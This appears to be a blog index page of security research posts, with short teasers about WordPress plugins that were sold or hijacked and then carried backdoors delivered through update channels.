Security Research

A Sold WordPress Plugin, a Hidden Update Channel, and 20,000 Backdoored Sites

I know you’ve heard this before however I’ve caught another plugin with a backdoor on wordpress.org. The plugin is Scroll To Top, slug scroll-top, with 20,000 active installs. The wordpress.org…

WordPress Plugin Hijacked in 2020 Hid a Dormant Backdoor for Years

Twelve sites in our fleet were running a tampered version 5.2.3 of Quick Page/Post Redirect Plugin. The file hash did not match anything on wordpress.org. The SVN log showed the plugin author committed the supply chain mechanism themselves.

Someone Bought 30 WordPress Plugins and Planted a Backdoor in All of Them.

Last week, I wrote about catching a supply chain attack on a WordPress plugin called Widget Logic. A trusted name, acquired by a new owner, turned into something malicious. It…

How I Caught a WordPress Plugin Supply Chain Attack

A routine security alert led to uncovering a WordPress plugin supply chain attack. The Widget Logic plugin had changed hands, and the new owner used version number manipulation to inject external JavaScript while preventing auto-updates from delivering the fix.